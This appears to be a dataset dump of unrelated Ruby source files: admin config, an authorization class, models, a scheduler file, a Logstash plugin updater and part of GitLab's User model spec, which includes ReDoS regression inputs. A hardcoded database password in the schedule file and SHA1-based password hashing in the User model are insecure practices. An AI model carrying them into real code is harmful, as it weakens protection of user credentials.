# == Localize Date/Time Format
#
# Set the localize format to display dates and times.
# To understand how to localize your app with I18n, read more at
# https://github.com/svenfuchs/i18n/blob/master/lib%2Fi18n%2Fbackend%2Fbase.rb#L52
#
config.localize_format = :long
# == Setting a Favicon
#
# config.favicon = 'favicon.ico'
# == Meta Tags
#
# Add additional meta tags to the head element of active admin pages.
#
# Add tags to all pages logged in users see:
# config.meta_tags = { author: 'My Company' }
# By default, sign up/sign in/recover password pages are excluded
# from showing up in search engine results by adding a robots meta
# tag. You can reset the hash of meta tags included in logged out
# pages:
# config.meta_tags_for_logged_out_pages = {}
# == Removing Breadcrumbs
#
# Breadcrumbs are enabled by default. You can customize them for individual
# resources or you can disable them globally from here.
#
# config.breadcrumb = false
# == Create Another Checkbox
#
# Create another checkbox is disabled by default. You can customize it for individual
# resources or you can enable them globally from here.
#
# config.create_another = true
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
# config.register_stylesheet 'my_stylesheet.css'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', media: :print
#
# To load a javascript file:
# config.register_javascript 'my_javascript.js'
# == CSV options
#
# Set the CSV builder separator
# config.csv_options = { col_sep: ';' }
#
# Force the use of quotes
# config.csv_options = { force_quotes: true }
# == Menu System
#
# You can add a navigation menu to be used in your application, or configure a provided menu
#
# To change the default utility navigation to show a link to your website & a logout btn
#
# config.namespace :admin do |admin|
# admin.build_menu :utility_navigation do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# admin.add_logout_button_to_menu menu
# end
# end
#
# If you wanted to add a static menu item to the default menu provided:
#
# config.namespace :admin do |admin|
# admin.build_menu :default do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# end
# end
# == Download Links
#
# You can disable download links on resource listing pages,
# or customize the formats shown per namespace/globally
#
# To disable/customize for the :admin namespace:
#
# config.namespace :admin do |admin|
#
# # Disable the links entirely
# admin.download_links = false
#
# # Only show XML & PDF options
# admin.download_links = [:xml, :pdf]
#
# # Enable/disable the links based on block
# # (for example, with cancan)
# admin.download_links = proc { can?(:view_download_links) }
#
# end
# == Pagination
#
# Pagination is enabled by default for all resources.
# You can control the default per page count for all resources here.
#
# config.default_per_page = 30
#
# You can control the max per page count too.
#
# config.max_per_page = 10_000
# == Filters
#
# By default the index screen includes a "Filters" sidebar on the right
# hand side with a filter for each attribute of the registered model.
# You can enable or disable them for all resources here.
#
# config.filters = true
#
# By default the filters include associations in a select, which means
# that every record will be loaded for each association.
# You can enabled or disable the inclusion
# of those filters by default here.
#
# config.include_default_association_filters = true
# == Footer
#
# By default, the footer shows the current Active Admin version. You can
# override the content of the footer here.
#
# config.footer = 'my custom footer text'
# == Sorting
#
# By default ActiveAdmin::OrderClause is used for sorting logic
# You can inherit it with own class and inject it for all resources
#
# config.order_clause = MyOrderClause
end
| 31.935374 | 116 | 0.701246 |
01801cbdb5a59f1cd08691615fb6d0f4a6fece91 | 4,391 | # frozen_string_literal: true
# rubocop:disable Metrics/ClassLength
class Ability
include CanCan::Ability
def initialize(user)
return if user.deactivated?
can :use_back_office, :all
assign_agency_user_permissions(user)
assign_finance_user_permissions(user)
end
private
def assign_agency_user_permissions(user)
permissions_for_agency_user if agency_user?(user)
permissions_for_agency_user_with_refund if agency_user_with_refund?(user)
permissions_for_agency_super_user if agency_super_user?(user)
permissions_for_developer_user if developer?(user)
end
def assign_finance_user_permissions(user)
permissions_for_finance_user if finance_user?(user)
permissions_for_finance_admin_user if finance_admin_user?(user)
permissions_for_finance_super_user if finance_super_user?(user)
end
# Permissions for specific roles
def permissions_for_agency_user
# This covers everything mounted in the engine and used for the assisted digital journey, including WorldPay
can :update, WasteCarriersEngine::RenewingRegistration
can :create, WasteCarriersEngine::Registration
can :renew, :all
can :view_certificate, WasteCarriersEngine::Registration
can :resend_confirmation_email, WasteCarriersEngine::Registration
can :order_copy_cards, WasteCarriersEngine::Registration
can :edit, WasteCarriersEngine::Registration
can :revert_to_payment_summary, :all
can :transfer_registration, [WasteCarriersEngine::Registration, RegistrationTransferPresenter]
end
def permissions_for_agency_user_with_refund
permissions_for_agency_user
can :view_revoked_reasons, :all
can :cease, WasteCarriersEngine::Registration
can :revoke, WasteCarriersEngine::Registration
can :cancel, :all
can :refund, :all
can :record_cash_payment, :all
can :record_cheque_payment, :all
can :record_postal_order_payment, :all
can :view_payments, :all
can :review_convictions, :all
can :write_off_small, WasteCarriersEngine::FinanceDetails do |finance_details|
finance_details.zero_difference_balance <= write_off_agency_user_cap
end
can :reverse, WasteCarriersEngine::Payment do |payment|
payment.cash? || payment.postal_order? || payment.cheque?
end
end
def permissions_for_finance_user
can :view_certificate, WasteCarriersEngine::Registration
can :record_bank_transfer_payment, :all
can :view_payments, :all
can :reverse, WasteCarriersEngine::Payment, &:bank_transfer?
end
def permissions_for_finance_admin_user
can :charge_adjust, :all
can :write_off_large, WasteCarriersEngine::FinanceDetails
can :view_certificate, WasteCarriersEngine::Registration
can :record_worldpay_missed_payment, :all
can :view_payments, :all
can :reverse, WasteCarriersEngine::Payment do |payment|
payment.worldpay? || payment.worldpay_missed?
end
end
def permissions_for_agency_super_user
permissions_for_agency_user_with_refund
can :manage_back_office_users, :all
# rubocop:disable Style/SymbolProc
can :modify_user, User do |user|
user.in_agency_group?
end
# rubocop:enable Style/SymbolProc
end
def permissions_for_finance_super_user
permissions_for_finance_admin_user
can :manage_back_office_users, User
can :charge_adjust, :all
# rubocop:disable Style/SymbolProc
can :modify_user, User do |user|
user.in_finance_group?
end
# rubocop:enable Style/SymbolProc
end
def permissions_for_developer_user
permissions_for_agency_user
can :manage, WasteCarriersEngine::FeatureToggle
can :import_conviction_data, :all
end
# Checks to see if role matches
def agency_user?(user)
user.role == "agency"
end
def agency_user_with_refund?(user)
user.role == "agency_with_refund"
end
def finance_user?(user)
user.role == "finance"
end
def finance_admin_user?(user)
user.role == "finance_admin"
end
def agency_super_user?(user)
user.role == "agency_super"
end
def finance_super_user?(user)
user.role == "finance_super"
end
def developer?(user)
user.role == "developer"
end
def write_off_agency_user_cap
@_write_off_agency_user_cap ||= WasteCarriersBackOffice::Application.config.write_off_agency_user_cap.to_i
end
end
# rubocop:enable Metrics/ClassLength
| 27.44375 | 112 | 0.763607 |
ac92dd300096d285ecd81727706a729d9120cde9 | 206 | class CreateInspirations < ActiveRecord::Migration[6.1]
def change
create_table :inspirations do |t|
t.string :name
t.string :image
t.text :bio
t.timestamps
end
end
end
| 17.166667 | 55 | 0.645631 |
ff1f81127c400301137249c48006872a97f510e6 | 168 | set :environment, "development"
env DB_USER, teamtat
env DB_NAME, teamtat_development
env DB_PASSWORD, 12345678
every 1.day, at: '3:00 am' do
rake "backup:db"
end
| 18.666667 | 32 | 0.75 |
e9efda6741612435dda64d6dd38b0040d917c02c | 4,893 | # == Schema Information
# Schema version: 2008100601002
#
# Table name: users
#
# id :integer(4) not null, primary key
# login :string(255)
# crypted_password :string(40)
# salt :string(40)
# created_at :datetime
# updated_at :datetime
# remember_token :string(255)
# remember_token_expires_at :datetime
# is_admin :boolean(1)
# can_send_messages :boolean(1) default(TRUE)
# email_verification :string(255)
# email_verified :boolean(1)
#
require 'digest/sha1'
require 'mime/types'
class User < ActiveRecord::Base
has_one :profile, :dependent => :nullify
# Virtual attribute for the unencrypted password
attr_accessor :password, :email, :terms_of_service
attr_protected :is_admin, :can_send_messages
attr_immutable :id
validates_acceptance_of :terms_of_service, :on => :create
validates_confirmation_of :password, :if => :password_required?
validates_presence_of :login
validates_presence_of :password, :if => :password_required?
validates_presence_of :password_confirmation, :if => :password_required?
validates_length_of :password_confirmation, :if => :password_required?,:within => 4..40
validates_length_of :password, :within => 4..40, :if => :password_required?
validates_length_of :login, :within => 3..40
validates_uniqueness_of :login, :case_sensitive => false
validates_format_of :email, :with => /^([^@\s]{1}+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$/i, :on => :create, :message=> I18n.t(:invalid_email_address_label)
before_save :encrypt_password
validates_less_reverse_captcha
def before_create
p = Profile.find_by_email @email
return true if p.blank?
errors.add(:email, I18n.t(:email_already_been_taken)) and return false unless p.user.blank?
end
def after_create
p = Profile.find_or_create_by_email @email
raise 'User found when should be nil' unless p.user.blank?
p.is_active=true
p.user_id = id
p.save
#AccountMailer.deliver_signup self.reload
end
def after_destroy
profile.update_attributes :is_active=>false
end
def f
profile.f
end
def can_mail? user
can_send_messages? && profile.is_active?
end
# Authenticates a user by their login name and unencrypted password.
# Returns the user or nil.
def self.authenticate(login, password)
u = find_by_login(login) # need to get the salt
u && u.authenticated?(password) ? u : nil
end
# Encrypts some data with the salt.
def self.encrypt(password, salt)
Digest::SHA1.hexdigest("--#{salt}--#{password}--")
end
# Encrypts the password with the user salt
def encrypt(password)
self.class.encrypt(password, salt)
end
def authenticated?(password)
crypted_password == encrypt(password)
end
def remember_me
self.remember_token_expires_at = 10.years.from_now
self.remember_token = UUID.random_create.to_s + '-' + UUID.random_create.to_s if self.remember_token.nil?
save false
end
def remember_token?
remember_token_expires_at && Time.now.utc < remember_token_expires_at
end
def forgot_password
@forgot = true
self.password = UUID.random_create.to_s[0,8]
self.password_confirmation = password
encrypt_password
save!
self.password
end
def change_password(current_password, new_password, confirm_password)
sp = User.encrypt(current_password, self.salt)
errors.add( :password, I18n.t(:password_supplied_incorrect)) and
return false unless sp == self.crypted_password
errors.add( :password, I18n.t(:new_password_does_not_match)) and
return false unless new_password == confirm_password
errors.add( :password, I18n.t(:new_password_may_not_be_blank)) and
return false if new_password.blank?
self.password = new_password
self.password_confirmation = confirm_password
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--")
self.crypted_password = encrypt(new_password)
save
end
def reset_password(new_password, confirm_password)
raise I18n.t(:new_password_does_not_match) unless new_password == confirm_password
raise I18n.t(:new_password_may_not_be_blank) if new_password.blank?
sp = User.encrypt(self.password, self.salt)
self.password = new_password
self.password_confirmation = confirm_password
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--")
self.crypted_password = encrypt(new_password)
save!
end
protected
# before filter
def encrypt_password
return if password.blank?
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--") if
new_record? || @forgot
self.crypted_password = encrypt(password)
end
def password_required?
crypted_password.blank? || !password.blank?
end
end
| 29.654545 | 150 | 0.700184 |
877fab5df52aff754cd48baec88cd58ccf1355f3 | 867 | module Form
class ClosedQuestion < ApplicationRecord
belongs_to :form
has_many :options, class_name: 'ClosedQuestionOption', dependent: :destroy,
foreign_key: 'question_id'
has_many :answers, class_name: 'ClosedQuestionAnswer', through: :options
validates :question, presence: true
validates :field_type, inclusion: %w[checkbox radio]
validates :required, inclusion: [true, false]
validates :position, presence: true, numericality: { only_integer: true }
validate :no_changes_allowed_on_present_responses
scope :required, (-> { where(required: true) })
def radio_question?
field_type == 'radio'
end
private
def no_changes_allowed_on_present_responses
return if !changed? || form.try(:responses).try(:empty?)
errors.add(:form, 'has any responses')
end
end
end
| 28.9 | 79 | 0.694348 |
acf2f195f51e65f834a9051da1f129c6ddb4a508 | 580 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-awesome-module"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/1appstudio/react-native-awesome-module.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm}"
s.dependency "React-Core"
end
| 29 | 118 | 0.601724 |
91b96026608f4afa33d66b0418309683784442fd | 763 | #!/usr/bin/env ruby
# Usage: count_verbs.rb <dict> <input>
#
# Count main verbs in input text.
#
# dict : dictionary of words with morphosyntactic tags
# input : input file on which to perform the verb count
#
# Example using morphosyntactic dictionary included with this repo:
#
# $ ./count_verbs.rb ../morphosyntax_dict.txt /path/to/input.txt
require "set"
abort "Usage: #$0 dict.txt text.txt" if ARGV.size != 2
dict, text = ARGV
verbs = Set.new
File.open(dict) do |f|
f.each_line do |line|
word, type = line.split(" ")
if type[0, 2] == "Gg"
verbs.add(word.downcase)
end
end
end
File.open(text) do |f|
f.each_line do |line|
count = line.split(" ").count { |word|
verbs.include?(word)
}
puts count
end
end
| 20.621622 | 67 | 0.650066 |
bf08bb65e56d91a49c8ba55740275d80fd8fd6d6 | 2,016 | require 'clamp'
require 'logstash/namespace'
require 'logstash/pluginmanager'
require 'logstash/pluginmanager/util'
require 'rubygems/installer'
require 'rubygems/uninstaller'
require 'jar-dependencies'
require 'jar_install_post_install_hook'
class LogStash::PluginManager::Update < Clamp::Command
parameter "[PLUGIN]", "Plugin name"
option "--version", "VERSION", "version of the plugin to install", :default => ">= 0"
option "--proxy", "PROXY", "Use HTTP proxy for remote operations"
def execute
::Gem.configuration.verbose = false
::Gem.configuration[:http_proxy] = proxy
if plugin.nil?
puts ("Updating all plugins")
else
puts ("Updating #{plugin} plugin")
end
specs = LogStash::PluginManager::Util.matching_specs(plugin).select{|spec| LogStash::PluginManager::Util.logstash_plugin?(spec) }
if specs.empty?
$stderr.puts ("No plugins found to update or trying to update a non logstash plugin.")
exit(99)
end
specs.each { |spec| update_gem(spec, version) }
end
def update_gem(spec, version)
unless gem_path = LogStash::PluginManager::Util.download_gem(spec.name, version)
$stderr.puts ("Plugin '#{spec.name}' does not exist remotely. Skipping.")
return nil
end
unless gem_meta = LogStash::PluginManager::Util.logstash_plugin?(gem_path)
$stderr.puts ("Invalid logstash plugin gem. skipping.")
return nil
end
unless Gem::Version.new(gem_meta.version) > Gem::Version.new(spec.version)
puts ("No newer version available for #{spec.name}. skipping.")
return nil
end
puts ("Updating #{spec.name} from version #{spec.version} to #{gem_meta.version}")
if LogStash::PluginManager::Util.installed?(spec.name)
::Gem.done_installing_hooks.clear
::Gem::Uninstaller.new(gem_meta.name, {}).uninstall
end
::Gem.configuration.verbose = false
::Gem.install(spec.name, version)
puts ("Update successful")
end
end # class Logstash::PluginManager
| 28.8 | 133 | 0.694444 |
e82e8c1a21d8ee3e5a27fc32c8a22678f90d0f40 | 152,139 | # frozen_string_literal: true
require 'spec_helper'
describe User do
include ProjectForksHelper
include TermsHelper
include ExclusiveLeaseHelpers
it_behaves_like 'having unique enum values'
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(TokenAuthenticatable) }
it { is_expected.to include_module(BlocksJsonSerialization) }
it { is_expected.to include_module(AsyncDeviseEmail) }
end
describe 'delegations' do
it { is_expected.to delegate_method(:path).to(:namespace).with_prefix }
it { is_expected.to delegate_method(:tab_width).to(:user_preference) }
it { is_expected.to delegate_method(:tab_width=).to(:user_preference).with_arguments(5) }
end
describe 'associations' do
it { is_expected.to have_one(:namespace) }
it { is_expected.to have_one(:status) }
it { is_expected.to have_one(:user_detail) }
it { is_expected.to have_one(:user_highest_role) }
it { is_expected.to have_many(:snippets).dependent(:destroy) }
it { is_expected.to have_many(:members) }
it { is_expected.to have_many(:project_members) }
it { is_expected.to have_many(:group_members) }
it { is_expected.to have_many(:groups) }
it { is_expected.to have_many(:keys).dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys).dependent(:nullify) }
it { is_expected.to have_many(:events).dependent(:delete_all) }
it { is_expected.to have_many(:issues).dependent(:destroy) }
it { is_expected.to have_many(:notes).dependent(:destroy) }
it { is_expected.to have_many(:merge_requests).dependent(:destroy) }
it { is_expected.to have_many(:identities).dependent(:destroy) }
it { is_expected.to have_many(:spam_logs).dependent(:destroy) }
it { is_expected.to have_many(:todos) }
it { is_expected.to have_many(:award_emoji).dependent(:destroy) }
it { is_expected.to have_many(:triggers).dependent(:destroy) }
it { is_expected.to have_many(:builds).dependent(:nullify) }
it { is_expected.to have_many(:pipelines).dependent(:nullify) }
it { is_expected.to have_many(:chat_names).dependent(:destroy) }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_many(:reported_abuse_reports).dependent(:destroy).class_name('AbuseReport') }
it { is_expected.to have_many(:custom_attributes).class_name('UserCustomAttribute') }
it { is_expected.to have_many(:releases).dependent(:nullify) }
it { is_expected.to have_many(:metrics_users_starred_dashboards).inverse_of(:user) }
describe "#bio" do
it 'syncs bio with `user_details.bio` on create' do
user = create(:user, bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
context 'when `migrate_bio_to_user_details` feature flag is off' do
before do
stub_feature_flags(migrate_bio_to_user_details: false)
end
it 'does not sync bio with `user_details.bio`' do
user = create(:user, bio: 'my bio')
expect(user.bio).to eq('my bio')
expect(user.user_detail.bio).to eq('')
end
end
it 'syncs bio with `user_details.bio` on update' do
user = create(:user)
user.update!(bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
context 'when `user_details` association already exists' do
let(:user) { create(:user) }
before do
create(:user_detail, user: user)
end
it 'syncs bio with `user_details.bio`' do
user.update!(bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
it 'falls back to "" when nil is given' do
user.update!(bio: nil)
expect(user.bio).to eq(nil)
expect(user.user_detail.bio).to eq('')
end
# very unlikely scenario
it 'truncates long bio when syncing to user_details' do
invalid_bio = 'a' * 256
truncated_bio = 'a' * 255
user.bio = invalid_bio
user.save(validate: false)
expect(user.user_detail.bio).to eq(truncated_bio)
end
end
end
describe "#abuse_report" do
let(:current_user) { create(:user) }
let(:other_user) { create(:user) }
it { is_expected.to have_one(:abuse_report) }
it "refers to the abuse report whose user_id is the current user" do
abuse_report = create(:abuse_report, reporter: other_user, user: current_user)
expect(current_user.abuse_report).to eq(abuse_report)
end
it "does not refer to the abuse report whose reporter_id is the current user" do
create(:abuse_report, reporter: current_user, user: other_user)
expect(current_user.abuse_report).to be_nil
end
it "does not update the user_id of an abuse report when the user is updated" do
abuse_report = create(:abuse_report, reporter: current_user, user: other_user)
current_user.block
expect(abuse_report.reload.user).to eq(other_user)
end
end
describe '#group_members' do
it 'does not include group memberships for which user is a requester' do
user = create(:user)
group = create(:group, :public)
group.request_access(user)
expect(user.group_members).to be_empty
end
end
describe '#project_members' do
it 'does not include project memberships for which user is a requester' do
user = create(:user)
project = create(:project, :public)
project.request_access(user)
expect(user.project_members).to be_empty
end
end
end
describe 'Devise emails' do
let!(:user) { create(:user) }
describe 'behaviour' do
it 'sends emails asynchronously' do
expect do
user.update!(email: '[email protected]')
end.to have_enqueued_job.on_queue('mailers').exactly(:twice)
end
end
end
describe 'validations' do
describe 'password' do
let!(:user) { create(:user) }
before do
allow(Devise).to receive(:password_length).and_return(8..128)
allow(described_class).to receive(:password_length).and_return(10..130)
end
context 'length' do
it { is_expected.to validate_length_of(:password).is_at_least(10).is_at_most(130) }
end
context 'length validator' do
context 'for a short password' do
before do
user.password = user.password_confirmation = 'abc'
end
it 'does not run the default Devise password length validation' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).not_to include('is too short (minimum is 8 characters)')
end
it 'runs the custom password length validator' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).to include('is too short (minimum is 10 characters)')
end
end
context 'for a long password' do
before do
user.password = user.password_confirmation = 'a' * 140
end
it 'does not run the default Devise password length validation' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).not_to include('is too long (maximum is 128 characters)')
end
it 'runs the custom password length validator' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).to include('is too long (maximum is 130 characters)')
end
end
end
end
describe 'name' do
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
end
describe 'first name' do
it { is_expected.to validate_length_of(:first_name).is_at_most(127) }
end
describe 'last name' do
it { is_expected.to validate_length_of(:last_name).is_at_most(127) }
end
describe 'username' do
it 'validates presence' do
expect(subject).to validate_presence_of(:username)
end
it 'rejects blacklisted names' do
user = build(:user, username: 'dashboard')
expect(user).not_to be_valid
expect(user.errors.messages[:username]).to eq ['dashboard is a reserved name']
end
it 'allows child names' do
user = build(:user, username: 'avatar')
expect(user).to be_valid
end
it 'allows wildcard names' do
user = build(:user, username: 'blob')
expect(user).to be_valid
end
context 'when username is changed' do
let(:user) { build_stubbed(:user, username: 'old_path', namespace: build_stubbed(:namespace)) }
it 'validates move_dir is allowed for the namespace' do
expect(user.namespace).to receive(:any_project_has_container_registry_tags?).and_return(true)
user.username = 'new_path'
expect(user).to be_invalid
expect(user.errors.messages[:username].first).to eq(_('cannot be changed if a personal project has container registry tags.'))
end
end
context 'when the username is in use by another user' do
let(:username) { 'foo' }
let!(:other_user) { create(:user, username: username) }
it 'is invalid' do
user = build(:user, username: username)
expect(user).not_to be_valid
expect(user.errors.full_messages).to eq(['Username has already been taken'])
end
end
end
it 'has a DB-level NOT NULL constraint on projects_limit' do
user = create(:user)
expect(user.persisted?).to eq(true)
expect do
user.update_columns(projects_limit: nil)
end.to raise_error(ActiveRecord::StatementInvalid)
end
it { is_expected.to validate_presence_of(:projects_limit) }
it { is_expected.to validate_numericality_of(:projects_limit) }
it { is_expected.to allow_value(0).for(:projects_limit) }
it { is_expected.not_to allow_value(-1).for(:projects_limit) }
it { is_expected.not_to allow_value(Gitlab::Database::MAX_INT_VALUE + 1).for(:projects_limit) }
it { is_expected.to validate_length_of(:bio).is_at_most(255) }
it_behaves_like 'an object with email-formated attributes', :email do
subject { build(:user) }
end
it_behaves_like 'an object with RFC3696 compliant email-formated attributes', :public_email, :notification_email do
subject { create(:user).tap { |user| user.emails << build(:email, email: email_value, confirmed_at: Time.current) } }
end
describe '#commit_email' do
subject(:user) { create(:user) }
it 'defaults to the primary email' do
expect(user.email).to be_present
expect(user.commit_email).to eq(user.email)
end
it 'defaults to the primary email when the column in the database is null' do
user.update_column(:commit_email, nil)
found_user = described_class.find_by(id: user.id)
expect(found_user.commit_email).to eq(user.email)
end
it 'returns the private commit email when commit_email has _private' do
user.update_column(:commit_email, Gitlab::PrivateCommitEmail::TOKEN)
expect(user.commit_email).to eq(user.private_commit_email)
end
it 'can be set to a confirmed email' do
confirmed = create(:email, :confirmed, user: user)
user.commit_email = confirmed.email
expect(user).to be_valid
expect(user.commit_email).to eq(confirmed.email)
end
it 'can not be set to an unconfirmed email' do
unconfirmed = create(:email, user: user)
user.commit_email = unconfirmed.email
# This should set the commit_email attribute to the primary email
expect(user).to be_valid
expect(user.commit_email).to eq(user.email)
end
it 'can not be set to a non-existent email' do
user.commit_email = '[email protected]'
# This should set the commit_email attribute to the primary email
expect(user).to be_valid
expect(user.commit_email).to eq(user.email)
end
it 'can not be set to an invalid email, even if confirmed' do
confirmed = create(:email, :confirmed, :skip_validate, user: user, email: 'invalid')
user.commit_email = confirmed.email
expect(user).not_to be_valid
end
end
describe 'email' do
context 'when no signup domains whitelisted' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return([])
end
it 'accepts any email' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
end
context 'bad regex' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['([a-zA-Z0-9]+)+\.com'])
end
it 'does not hang on evil input' do
user = build(:user, email: 'user@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!.com')
expect do
Timeout.timeout(2.seconds) { user.valid? }
end.not_to raise_error
end
end
context 'when a signup domain is whitelisted and subdomains are allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['example.com', '*.example.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
end
context 'when a signup domain is whitelisted and subdomains are not allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['example.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
it 'accepts [email protected] when added by another user' do
user = build(:user, email: "[email protected]", created_by_id: 1)
expect(user).to be_valid
end
end
context 'domain blacklist' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist_enabled?).and_return(true)
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['example.com'])
end
context 'bad regex' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['([a-zA-Z0-9]+)+\.com'])
end
it 'does not hang on evil input' do
user = build(:user, email: 'user@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!.com')
expect do
Timeout.timeout(2.seconds) { user.valid? }
end.not_to raise_error
end
end
context 'when a signup domain is blacklisted' do
it 'accepts [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'accepts [email protected] when added by another user' do
user = build(:user, email: '[email protected]', created_by_id: 1)
expect(user).to be_valid
end
end
context 'when a signup domain is blacklisted but a wildcard subdomain is allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['test.example.com'])
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['*.example.com'])
end
it 'gives priority to whitelist and allow [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
end
context 'with both lists containing a domain' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['test.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
end
end
context 'email restrictions' do
context 'when email restriction is disabled' do
before do
stub_application_setting(email_restrictions_enabled: false)
stub_application_setting(email_restrictions: '\+')
end
it 'does accept email address' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
end
context 'when email restrictions is enabled' do
before do
stub_application_setting(email_restrictions_enabled: true)
stub_application_setting(email_restrictions: '([\+]|\b(\w*gitlab.com\w*)\b)')
end
it 'does not accept email address with + characters' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'does not accept email with a gitlab domain' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'adds an error message when email is not accepted' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
expect(user.errors.messages[:email].first).to eq(_('is not allowed. Try again with a different email address, or contact your GitLab admin.'))
end
it 'does accept a valid email address' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
context 'when created_by_id is set' do
it 'does accept the email address' do
user = build(:user, email: '[email protected]', created_by_id: 1)
expect(user).to be_valid
end
end
end
end
context 'owns_notification_email' do
it 'accepts temp_oauth_email emails' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'does not accept not verified emails' do
email = create(:email)
user = email.user
user.update(notification_email: email.email)
expect(user).to be_invalid
end
end
context 'owns_public_email' do
it 'accepts verified emails' do
email = create(:email, :confirmed, email: '[email protected]')
user = email.user
user.update(public_email: email.email)
expect(user).to be_valid
end
it 'does not accept not verified emails' do
email = create(:email)
user = email.user
user.update(public_email: email.email)
expect(user).to be_invalid
end
end
context 'set_commit_email' do
it 'keeps commit email when private commit email is being used' do
user = create(:user, commit_email: Gitlab::PrivateCommitEmail::TOKEN)
expect(user.read_attribute(:commit_email)).to eq(Gitlab::PrivateCommitEmail::TOKEN)
end
it 'keeps the commit email when nil' do
user = create(:user, commit_email: nil)
expect(user.read_attribute(:commit_email)).to be_nil
end
it 'reverts to nil when email is not verified' do
user = create(:user, commit_email: "[email protected]")
expect(user.read_attribute(:commit_email)).to be_nil
end
end
context 'owns_commit_email' do
it 'accepts private commit email' do
user = build(:user, commit_email: Gitlab::PrivateCommitEmail::TOKEN)
expect(user).to be_valid
end
it 'accepts nil commit email' do
user = build(:user, commit_email: nil)
expect(user).to be_valid
end
end
end
end
describe "scopes" do
describe ".with_two_factor" do
it "returns users with 2fa enabled via OTP" do
user_with_2fa = create(:user, :two_factor_via_otp)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to include(user_with_2fa.id)
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it "returns users with 2fa enabled via U2F" do
user_with_2fa = create(:user, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to include(user_with_2fa.id)
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it "returns users with 2fa enabled via OTP and U2F" do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
user_without_2fa = create(:user)
users_with_two_factor = described_class.with_two_factor.pluck(:id)
expect(users_with_two_factor).to eq([user_with_2fa.id])
expect(users_with_two_factor).not_to include(user_without_2fa.id)
end
it 'works with ORDER BY' do
user_with_2fa = create(:user, :two_factor_via_otp, :two_factor_via_u2f)
expect(described_class
.with_two_factor
.reorder_by_name).to eq([user_with_2fa])
end
end
describe ".without_two_factor" do
it "excludes users with 2fa enabled via OTP" do
user_with_2fa = create(:user, :two_factor_via_otp)
user_without_2fa = create(:user)
users_without_two_factor = described_class.without_two_factor.pluck(:id)
expect(users_without_two_factor).to include(user_without_2fa.id)
